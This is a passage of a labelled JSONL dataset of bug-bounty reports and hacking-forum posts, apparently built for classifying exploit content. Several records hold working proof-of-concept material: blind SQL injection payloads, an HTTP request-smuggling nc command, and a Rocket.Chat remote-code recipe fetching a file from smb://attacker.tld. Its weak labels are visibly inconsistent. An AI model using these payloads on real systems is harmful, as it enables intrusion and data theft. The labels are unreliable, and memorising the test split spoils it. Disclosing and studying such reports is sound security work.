'/file.txt', () => {\n\t\tconsole.log('able to watch a file without any permissions');\n\t});\n}\n\nmain();\n```\n\n## Impact: [add why this issue matters]\n\nThe permission system is bypassed. Attackers can receive events related to files they do not have access to.\n\n## Supporting Material/References:\n\nNone\n\n## Impact\n\nThe permission system is bypassed.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ab41e4393dc46a4b6ee4", "text": "[HTTP Request Smuggling] HTTP Request Smuggling via Empty headers separated by CR\n\n**Summary:** \nThe `llhttp` parser in the http module in Node v20.2.0 does not strictly use the CRLF sequence to delimit HTTP requests. This can lead to HTTP Request Smuggling (HRS).\n\n**Description:** \nThe CR character (without LF) is sufficient to delimit HTTP header fields in the llhttp parser. According to RFC7230 section 3, only the CRLF sequence should delimit each header-field.\n\n## Steps To Reproduce:\n\n*Server:*\n\n```javascript\nconst http = require(\"http\");\n\nhttp\n .createServer((request, response) => {\n let body = [];\n request\n .on(\"error\", (err) => {\n response.end(\"Request Error: \" + err);\n })\n .on(\"data\", (chunk) => {\n body.push(chunk);\n })\n .on(\"end\", () => {\n body = Buffer.concat(body).toString();\n\n // log the body to stdout to catch the smuggled request\n console.log(\"Response\");\n console.log(request.headers);\n console.log(body);\n console.log(\"---\");\n\n response.on(\"error\", (err) => {\n // log the body to stdout to catch the smuggled request\n response.end(\"Response Error: \" + err);\n });\n\n response.end(\n \"Body length: \" + body.length.toString() + \" Body: \" + body\n );\n });\n })\n .listen(5000);\n```\n\n*Payload:*\n\n1. Execute the below command.\n```shell\nprintf \"POST / HTTP/1.1\\r\\n\"\\\n \"Host: localhost:5000\\r\\n\"\\\n \"X-Abc:\\rxTransfer-Encoding: chunked\\r\\n\"\\\n \"\\r\\n\"\\\n \"1\\r\\n\"\\\n \"A\\r\\n\"\\\n \"0\\r\\n\"\\\n \"\\r\\n\" | nc localhost 5000\n```\n\n2. Note that the value of `X-Abc` header in the request is - `[\\r]xTransfer-Encoding: chunked[\\r\\n]`\n3. The llhttp library parses this as a `Transfer-Encoding: chunked` header.\n```\nResponse\n{ host: 'localhost:5000', 'x-abc': '', 'transfer-encoding': 'chunked' }\nA\n---\n```\n\n*Note:*\n1. The next character to `\\r` is missing in the parsed header name.\n2. This test case is missing from https://github.com/nodejs/llhttp/blob/main/test/request/invalid.md.\n\nA frontend proxy that does not consider `\\r` as termination of an HTTP header value, could forward this to a backend, causing an HRS. \n\n## Supporting Material/References:\n\nThis report is similar to:\n * https://hackerone.com/reports/1888760\n\n## Impact\n\nHTTP Request Smuggling can lead to access control bypass.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8acb9d8f9e08ac3f1b3e", "text": "Hi, How did you get the result of Harry is 1337?. What method did you used?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-03-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0a2a71ccc2f150c43da7", "text": "I don’t know if this is still relevant, but you should think where you could else use the found credentials.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-08-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7ed3c4b8e6a009021121", "text": "[OS Command Injection] Insecure use of shell.openExternal() in Rocket.Chat Desktop App leading to RCE\n\n**Summary:** The Rocket.Chat Desktop app passes the links users click on to Electron's `shell.openExternal()` function which can lead to remote code execution.\n\n**Description:** The filtering on the URLs passed to `shell.openExternal()` is insufficient. An attacker can craft and send a link that when clicked will cause malicious code from a remote origin to be executed on the user's system. The specific attack presented here has been tested with Xubuntu 20.04, however similar attacks are also possible on other systems, including non-Linux operating systems.\n\n## Releases Affected:\n\n * Tested with latest release 2.17.10 from https://github.com/RocketChat/Rocket.Chat.Electron/releases\n * Tested with latest commit `4c06582` on the `develop` branch from https://github.com/RocketChat/Rocket.Chat.Electron\n\n## Steps To Reproduce (from initial installation to vulnerability):\n\n 1. Install Rocket.Chat Desktop on Xubuntu 20.04.\n 2. Login and join a channel.\n 3. Setup a public Samba server (at `attacker.tld` in this example) and create a public share (named `public` here). In this share, publish the following file as `pwn.desktop` and make it executable:\n \n ```ini\n [Desktop Entry]\n Exec=bash -c \"(mate-calc &); xmessage \\\"Hello from Electron.\\\"\"\n Type=Application\n ```\n 4. From another account in the same channel, send the following message with the corresponding values replaced: `smb://attacker.tld/public/pwn.desktop`\n 5. Click the link and (if necessary) confirm starting the untrusted launcher.\n 6. Notice the calculator and message box appearing, confirming remote code execution.\n\n## Supporting Material/References:\n\n * I have attached a video of the attack to the report.\n\n## Suggested mitigation\n\n * The problem is in the filter for local file paths in the preload scripts that sets up the link handler here: https://github.com/RocketChat/Rocket.Chat.Electron/blob/4c06582ba3021fcf10e6230286231d50e26e2723/src/preload/links.js#L24\n * The filter only acts as a blocklist, filtering out `file://` links. There are however plenty of other protocols depending on the system, like `smb://` as shown here. Therefore, only an allowlist can successfully prevent attacks here. Usually, allowing `http://`, `https://` and `mailto:` will be enough but you may have different requirements.\n\nBest Regards, \nBenjamin Altpeter \nTechnical University of Braunschweig, Germany\n\n## Impact\n\n* The attack can be triggered remotely by an attacker by simply sending a message to a channel.\n * The particular attack presented here requires user interaction. The user has to click the link (which is not obfuscated) and potentially confirm launching the executable. The last part may not be necessary depending on the particular attack vector and system the user runs.\n * This particular presented attack only works on certain Linux distributions. However, this is only due to the particular attack payload used (a Linux `.desktop` file accessed over Samba). Similar payloads will also work on other Linux distributions as well as Windows and macOS. The Electron documentation explicitly warns against using `shell.openExternal()` with untrusted content: https://www.electronjs.org/docs/tutorial/security#14-do-not-use-openexternal-with-untrusted-content\n * If the attack is executed successfully, the attacker can run arbitrary code on the user's system.\n * Patching the problem is simple and doesn't break any legitimate use cases that I can think of.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-08-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3ddc709024927196ac4d", "text": "[Cross-site Scripting (XSS) - Generic] xss on reset password page\n\ntarget:https://█████/Default.aspx?TabId=81&ctl=SendPassword&returnurl=%252fUOTSHelpDesk\n\nWhen a user goes on the forget password page and enters a username it is reflected onto the page. An attacker could simply enter a username like and it would execute an alert not to mention there is no csrf protection allowing a attacker to possibly chain csrf with this and cause alot of harm.\n\n\nreferences:\nhttps://owncloud.com/security-advisories/reflected-xss-in-login-page-forgot-password-functionallity/\nhttps://hackerone.com/reports/125059\n\n## Impact\n\nan attacker could steal cookies from a user social engineer them or redirect them\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\ngo to https://████/Default.aspx?TabId=81&ctl=SendPassword&returnurl=%252fUOTSHelpDesk\nenter a payload in username field\n\n## Suggested Mitigation/Remediation Actions\nput a character limit and sanitize user input", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ab860873c97897026156", "text": "[Improper Authorization] Claiming the listing of a non-delivery restaurant through OTP manipulation\n\n**Summary:** Am able to claim any restaurant which is not claimed before.\n\n**Description:** An endpoint `POST /restaurant-onboard-diy/v2/send-auto-claim-otp HTTP/2` sends OTP to the restaurant mobile no.\n\n##Request (Request:1) is - \n```\nPOST /restaurant-onboard-diy/v2/send-auto-claim-otp HTTP/2\nHost: www.zomato.com\nCookie: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\nContent-Length: 58\nSec-Ch-Ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"90\"\nAccept: application/json, text/plain, */*\nX-Zomato-Csrft: XXXXXXXXXXXXXXXXXXXXXXX\nSec-Ch-Ua-Mobile: ?0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\nContent-Type: application/json;charset=UTF-8\nOrigin: https://www.zomato.com\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: https://www.zomato.com/partner_with_us/ownership\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n{\"number\":\"XXXXXXXXXX\",\"isdCode\":\"+91\",\"resId\":\"XXXXXXXXXX\"}\n```\nwhich responses -\n```\n{\"status\":\"success\",\"message\":\"OTP SENT\",\"requestId\":XXXXXXX,\"code\":2}\n```\n\n###Here Attacker gains OTP on his own mobile no by changing the `number` & `resId` to his own restaurant.\n\nBy using the following request (Request:2) attacker is able to map his e-mail Id as `Owner / Manager` to Victim restaurant.\n##Request:2\n```\nPOST /restaurant-onboard-diy/v2/verify-auto-claim-otp HTTP/2\nHost: www.zomato.com\nCookie: XXXXXXXXXXXXXXXX\nContent-Length: 68\nSec-Ch-Ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"90\"\nAccept: application/json, text/plain, */*\nX-Zomato-Csrft: XXXXXXXXXXXXXXXXXXXXX\nSec-Ch-Ua-Mobile: ?0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\nContent-Type: application/json;charset=UTF-8\nOrigin: https://www.zomato.com\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: https://www.zomato.com/partner_with_us/ownership\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n{\"verificationCode\":XXX,\"requestId\":\"XXXXXXXX\",\"resId\":\"XXXXXXXXX\"}\n```\n\n###Here by changing the `verificationCode` - (Otp received on Attacker Mobile in response of Request :1 )& `requestId` (Response of request:1) and `resId` to Victim Restaurant. Request:2 maps e-mail id of Attacker to Victim restaurant.\n\n**Prerequisite - Attacker should have a restaurant page, mapped Mobile No With Email Id.**\n\n**Note : - If any restaurant is not mapped owner / manager then claimed restaurant can be claimed **\n\n## Impact\n\nClaim a restaurant.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "639e3ac2e3e7ca0edf03", "text": "Should I install windows on my laptop, or should I start with kali immediately?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-05-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "75f1fd959d1ca37c2ffa", "text": "[Cross-site Scripting (XSS) - Reflected] XSS at videostore.mtnonline.com/GL/*.aspx via all parameters\n\nPoC\n```\nhttps://videostore.mtnonline.com/GL/MyAccount.aspx?PId=126&CID=5&OprId=11%27>\n```\n\nSymbols <\"/'> are not filtered that alloweds to inject HTML code.\n{F1353609}\n\n## Impact\n\nXSS at videostore.mtnonline.com", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bfddde251db2344e9b49", "text": "[Authentication Bypass Using an Alternate Path or Channel] Admin.MyTVA.com Customer lookup and internal notes bypass\n\n## Summary:\nThe admin.mytva.com site does not properly secure the admin only endpoints, which can allow an attacker to bypass the login and take actions like looking up customers. The endpoints can be enumerated through the forgot password function.\n\n## Steps To Reproduce:\n\n\n 1. Navigate to https://admin.mytva.com/Account/ForgotPassword.aspx and enter 'admin' as the ID\n 2. Wait on the admin email to appear (this should also be restricted)\n 3. Attempt to send the reset password and capture the request with BURP\n4. Review the response to the request for new endpoints. Some of them that will stand out are:\n/Evaluation/EditNotes.aspx?ProjectId=\n/Evaluation/HOEvalDetailWONav.aspx?ProjectID=\n/Tools/Customer/AddressLookup.aspx\n5. The endpoints do not protect themselves for bruteforcing either, so the attacker can now attempt to retrieve further information or add internal/customer notes\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\n\n## Impact\n\nUnprotected endpoints may lead to a data breach. It would be recommended to check the logs for previous attacks", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "dd311b22590e8c429cd8", "text": "[Cross-site Scripting (XSS) - Stored] XSS via Mod Log Removed Posts\n\n## Summary:\nI have discovered an XSS vulnerability regarding the mod notes feature. Specifically, the XSS payload executes when the victim removes a post in a subreddit and opens up the mod notes of the attacker.\n\n## Steps To Reproduce:\n\n1. The attacker creates a new post with the title containing the XSS payload.\n2. The victim (mods of the subreddit) then must remove your post.\n3. The payload executes when a victim (subreddit mod) opens up your mod notes. Sometimes, the mod notes are displayed when the victim hovers on your profile (this is true when a recent mod action has been taken on the user). \n\n## Supporting Material/References:\n\n█████\n█████\n\n## Impact\n\nImpact Below:", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4fbbe62ff32af62df370", "text": "Guys, does anybody know why “character shifting” technique for “&” doesn’t work here? It accepts %26, but $(tr%09’!-}‘%09’\"-~'<<<%) results in an error.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-04-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "58761e3371de6602677a", "text": "ss -l -4 | tr “.” \" \" | column -t | grep LISTEN | grep -v “127” | wc -l worked for me all fine tr - replaces the dots with spaces column separates everything into columns grep then we filter LISTEN grep -v filters out 127 wc gives you your answerr", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-05-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0ed4e460fa8ed44da0cb", "text": "[Improper Authentication - Generic] Otp bypass in verifying nin\n\n## Summary:\n\nwhile conducting my research in your website I found that while verifying NIN number it send the otp to the enterd mobile number that can be bypassed.\n\n## Steps To Reproduce:\n\n1) Go to https://nin.mtnonline.com/nin/\n2) click submit nin.Now it will redirect to another page https://nin.mtnonline.com/nin/\n3) It asks for mobile number and National Identity Number [NIN].\n4) Enter the mobile and NIN number and click Next.It will send the otp to the mobile number.\n5) Enter any 6 digit code and click verify and capture the request in bupsuite and click action and select \"Do intercept and response to the request\"\n6) Now change the response status to success.\n------>Now successfully verified mobile number.\n\n## Impact\n\nThe attacker can able to verify NIN with any number.\n\n\nNote: I had attached the poc video below please take a look.\n\n\nRegards,\n@aaruthra.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-17", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "50cad7ecf7222a5397ae", "text": "Hi can anyone DM on overflown, I already have the exploit working but Im not sure where to use it.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-02-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "847c5f8fe3579580f6a1", "text": "[Cryptographic Issues - Generic] CURLOPT_SSH_HOST_PUBLIC_KEY_SHA256 comparison disaster\n\n## Summary:\n`CURLOPT_SSH_HOST_PUBLIC_KEY_SHA256` base64 encoded host fingerprint is compared case-insensitive by accident. This means that it is technically possible (however still difficult) to create forged ssh host key that matches in this comparison.\n\nThe bug appears to have been introduced when adding `CURLOPT_SSH_HOST_PUBLIC_KEY_SHA256` support, and then copying the case insensitive comparison of the string for` CURLOPT_SSH_HOST_PUBLIC_KEY_MD5` (where it is appropriate since the MD5 fingerprint is a hex string).\n\nThis bug as added by commit https://github.com/curl/curl/commit/d1e7d9197b7fe417fb4d62aad5ea8f15a06d906c\n\n## Impact\n\nHost identify spoofing", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3466f560970a0fbc340e", "text": "[SQL Injection] SqlInject at ██████\n\n**Description:**\nDear DoD,\nI found the injection at:https://██████/\n\n** Steps to reproduce **\n1.open https://██████████/MEDIA/Posters\n\n2.Type in the search box '\n\n█████\n\n3.After capturing packets through burp, the injection point is at searchText\n\n```\nGET /API/Evotiva-UserFiles/GetItemsServices/GetItems?itemId=27293&rootItemId=27293&sortExpression=LastModifiedOnDate%2Ctrue&searchText=&searchTags=&take=25&skip=0&page=1&pageSize=25 HTTP/1.1\nHost: ███\nTabid: 1236\nSec-Ch-Ua: \"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"114\", \"Microsoft Edge\";v=\"114\"\nRequestverificationtoken: V-hXssqxuHlRDyUEJbBTYFASgfr6bkOTeGgemYKdc0jsjPPEhri1fP1l-vJbcSyUMOYiXQ2\nSec-Ch-Ua-Mobile: ?0\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nModuleid: 9270\nSec-Ch-Ua-Platform: \"Windows\"\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: https://██████/MEDIA/Posters\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64;) Gecko/20100101 Firefox/20.0\nConnection: close\n\n```\n\n4.proof of concept poc \nThe following is the poc for ture\n\n```\n')AND+22=22+AND+('NaXY'+LIKE+'NaXY\n```\n████████\n\n5.The following is the poc for false\n```\n')AND+22=21+AND+('NaXY'+LIKE+'NaXY\n```\n██████\n\n5.Get the current user length is 22\n```\n')AND+len(user)=22+AND+('NaXY'+LIKE+'NaXY\n```\n████\n\n██████\n\n6.Get users from the current database\nPOC:\n\nPlease note! Among them, the fifth character is a special character, we need to match it by ascii code\n```\n')AND+ascii(substring(user,5,1))='92'+AND+('NaXY'+LIKE+'NaXY\n```\nThe user who finally ran out was ** nase/svc.puub17.zp.safe **\n\n█████\n\n7.Here is a screenshot of sqlmap\n\n█████\n\n## Impact\n\nAn attacker can obtain information from the database\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nPlease see Description\n\n## Suggested Mitigation/Remediation Actions\nUse parameterized statements, do not splice sql", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "de2a673258f38b088f36", "text": "[Cross-Site Request Forgery (CSRF)] CSRF to change password\n\nDescription \n\nCross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.\n\n\nI have found CSRF to change password , \n\nPOC \n\n\n\n\n \n
\n \n \n \n \n
\n \n\n\nThanks", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "71ef94166492d07229f5", "text": "[Unknown] CPP: Add query for CWE-243 Creation of chroot Jail Without Changing Working Directory\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "62bb6ff630163d70702e", "text": "[Cross-site Scripting (XSS) - Reflected] XSS on https://████████/████' parameter\n\nPoC\n```\nhttps://█████/██████████\n```\n███████\n\n## Impact\n\nXSS on https://████/\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nGot to \n```\nhttps://██████/███\n```\n\n## Suggested Mitigation/Remediation Actions", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8228638e6549471b1155", "text": "[Improper Access Control - Generic] CORS Misconfiguration in https://████████/accounts/login/\n\n**Description: Cross-origin resource sharing (CORS) is a browser mechanism that enables controlled access to resources located outside of a given domain. However, it also provides a potential for cross-domain-based attacks, if a website's CORS policy is poorly configured and implemented. CORS can be exploited to trust any arbitrary domain attacker-controlled domain name and send the data to it. Attackers can make an exploit and ask the domain to send data of the victim to the attacker domain.\n\nAs you can see when we run the above request in Burp Suite.\nAccess-Control-Allow-Origin: evil.com\nAccess-Control-Allow-Credentials: true\n\n## Impact\n\nAn Adversary can carry out a CORS attack to exfiltrate the sensitive details of a victim.\n\n## System Host(s)\n████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nFirst, put any information in the user and password: put any wrong information and send it and pick up the request\n\nyou will see the (Origin:) Edit it and put evil.com and it will look like this \n\n```\nPOST /accounts/login/ HTTP/1.1\n\nHost: ██████\n\nCookie: _ga_8P65SJGTV5=GS1.1.1667594184.4.0.1667594184.0.0.0; _ga=GA1.1.1314420854.1667559540; csrftoken=JvozZTiwMukzgt7inOPsCLhG2hVTT98qt7mybOSNtumWh0D3w9xIJS4cOePatlet\n\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\n\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n\nAccept-Language: en-US,en;q=0.5\n\nAccept-Encoding: gzip, deflate\n\nContent-Type: application/x-www-form-urlencoded\n\nContent-Length: 117\n\nOrigin: https://evil.com\n\nReferer: https://█████/accounts/login/\n\nUpgrade-Insecure-Requests: 1\n\nSec-Fetch-Dest: document\n\nSec-Fetch-Mode: navigate\n\nSec-Fetch-Site: same-origin\n\nSec-Fetch-User: ?1\n\nTe: trailers\n\nConnection: close\n\n\n\ncsrfmiddlewaretoken=KLecVs84vqKcXOXH0olIf9HCjSIsW9sDuncb7nIlcqMzYlts9J3Ymgu85PCJwlyG&█████\n```\n\nresponse\n\n```\nHTTP/1.1 200 OK\n\nServer: nginx/1.23.0\n\nDate: Fri, 11 Nov 2022 16:36:45 GMT\n\nContent-Type: text/html; charset=utf-8\n\nContent-Length: 3371\n\nConnection: close\n\nExpires: Fri, 11 Nov 2022 16:36:45 GMT\n\nCache-Control: max-age=0, no-cache, no-store, must-revalidate, private\n\nVary: Cookie, Origin\n\nX-Frame-Options: DENY\n\nAccess-Control-Allow-Credentials: true\n\nAccess-Control-Allow-Origin: https://evil.com\n\nAccess-Control-Expose-Headers: ETag, Last-Modified, Cache-Control, Content-Type, Content-Length, WWW-Authenticate, X-Experience-API-Version, Accept-Language\n\nSet-Cookie: csrftoken=JvozZTiwMukzgt7inOPsCLhG2hVTT98qt7mybOSNtumWh0D3w9xIJS4cOePatlet; expires=Fri, 10 Nov 2023 16:36:45 GMT; Max-Age=31449600; Path=/; SameSite=Lax\n\n\n\n\n\n\n \n \n \n\n \n \n \n \n\n \n \n \n \n \n \n\n\n █████████ Login\n\n\n\n
\n
\n
\n
\n \n \n
\n \nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\nType \"show copying\" and \"show warranty\" for details.\nThis GDB was configured as \"x86_64-linux-gnu\".\nType \"show configuration\" for configuration details.\nFor bug reporting instructions, please see:\n.\nFind the GDB manual and other documentation resources online at:\n .\n\nFor help, type \"help\".\nType \"apropos word\" to search for commands related to \"word\"...\nReading symbols from ./multithread...\n(No debugging symbols found in ./multithread)\n(gdb) r\nStarting program: /home/user/curl/multithread\n/home/user/curl/multithread: ./lib/.libs/libcurl.so.4: no version information available (required by /home/user/curl/multithread)\n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library \"/lib/x86_64-linux-gnu/libthread_db.so.1\".\n[New Thread 0x7ffff6ffc6c0 (LWP 2733684)]\nThread 0, gets http://curl.haxx.se/\n[New Thread 0x7ffff67fb6c0 (LWP 2733685)]\nThread 1, gets ftp://cool.haxx.se/\n[New Thread 0x7ffff5ffa6c0 (LWP 2733686)]\n[New Thread 0x7ffff57f96c0 (LWP 2733687)]\nThread 2, gets http://www.contactor.se/\n[New Thread 0x7ffff4ff86c0 (LWP 2733688)]\n[New Thread 0x7fffe77fe6c0 (LWP 2733690)]\n[New Thread 0x7fffe7fff6c0 (LWP 2733689)]\nThread 3, gets www.haxx.se\n[New Thread 0x7fffe6ffd6c0 (LWP 2733691)]\n\nThread 1 \"multithread\" received signal SIGSEGV, Segmentation fault.\n0x00007ffff7f42b32 in Curl_failf () from ./lib/.libs/libcurl.so.4\n(gdb) bt\n#0 0x00007ffff7f42b32 in Curl_failf () from ./lib/.libs/libcurl.so.4\n#1 0x00007ffff7f546dd in Curl_resolv_timeout () from ./lib/.libs/libcurl.so.4\n#2 0x0000000000000000 in ?? ()\n```\n\n## Risk discussion\nI don't consider this issue a major risk since it likely will affect only small percentage of target platforms. Some ", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-28320"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-17", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f1bb7ababab9327dd245", "text": "[Path Traversal: 'dir\\..\\..\\filename'] Potential directory traversal in OC\\Files\\Node\\Folder::getFullPath\n\nhttps://github.com/nextcloud/server/blob/67551f379f3105d117b9d19095dd381450fe40dd/lib/private/Files/Node/Folder.php#L68-L73\nis validating and normalizing the string in the wrong order.\n\nValidation checks for `/../` kind of situations and `normalizePath` later on replaces `\\` with `/`, so it would be possible to get `/../` again.\n\n```php\n\tpublic function getFullPath($path) {\n\t\tif (!$this->isValidPath($path)) {\n\t\t\tthrow new NotPermittedException('Invalid path');\n\t\t}\n\t\treturn $this->path . $this->normalizePath($path);\n\t}\n```\n\n## Impact\n\nThe function seems to be used in newFile() and newFolder() items, allowing to create paths outside of ones own space and overwriting stuff from others.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "da25de3533b8940c7560", "text": "[Unknown] No rate Limit on Password Reset page on upchieve\n\n## Summary:\nIntroduction\nA little bit about Rate Limit:\nA rate limiting algorithm is used to check if the user session (or IP-address) has to be limited based on the information in the session cache.\nIn case a client made too many requests within a given timeframe, HTTP-Servers can respond with status code 429: Too Many Requests.\n## Description:-\nI have identified that when Forgetting Password for account , the request has no rate limit which then can be used to loop through one request. Which can be annoying to the root users sending mass password to one email.\n\n## Steps To Reproduce:\n\nStep 1 - Go To This Link https://app.upchieve.org/resetpassword\nEnter Email Click On Password reset\nStep 2- Intercept This Request In Burp And Forward Till You Found Your Number In Request Like {\"email\":\"your email here\"}\nPOST /auth/reset/send HTTP/1.1\nHost: app.upchieve.org\nConnection: close\nContent-Length: 33\nsec-ch-ua: \";Not A Brand\";v=\"99\", \"Chromium\";v=\"88\"\ntracestate: 2674974@nr=0-1-2674974-429165133-b9956c2e6b3639e7----1629976379525\ntraceparent: 00-e7350f9e341fa39e254aa02c0f122da0-b9956c2e6b3639e7-01\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36\nnewrelic: eyJ2IjpbMCwxXSwiZCI6eyJ0eSI6IkJyb3dzZXIiLCJhYyI6IjI2NzQ5NzQiLCJhcCI6IjQyOTE2NTEzMyIsImlkIjoiYjk5NTZjMmU2YjM2MzllNyIsInRyIjoiZTczNTBmOWUzNDFmYTM5ZTI1NGFhMDJjMGYxMjJkYTAiLCJ0aSI6MTYyOTk3NjM3OTUyNX19\nContent-Type: application/json;charset=UTF-8\nAccept: application/json, text/plain, /\nX-Requested-With: XMLHttpRequest\nOrigin: https://app.upchieve.org\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nCookie: connect.sid=s%3AkYhTVAV6Oj2QjvpjuTv3wJ1zKt5ufbMJ.uk31xcaQ3wYhGhW5ENHODg%2BPAi%2F%2BXR8DRmrBGOtAAv0; _gcl_au=1.1.1255782218.1629976051; __cf_bm=b5af105528eef748000d008d193bda0737ac24eb-1629975748-1800-AcBqcZPRoF1OJRXniCl5v9UBOoadddugz8c4P3RSHhLOz92UsACn7wdtKq3E0xUEGHhdTt6W8MlhhmtWaHQtIM+EBAomTYnbZ9ZxfnFt+BpeqOfbbOQYmCGhspVzU4fAzCaC1Bun8/SDKAkqHRkD/Dw=; _ga=GA1.2.238689867.1629976053; _gid=GA1.2.344859836.1629976053; 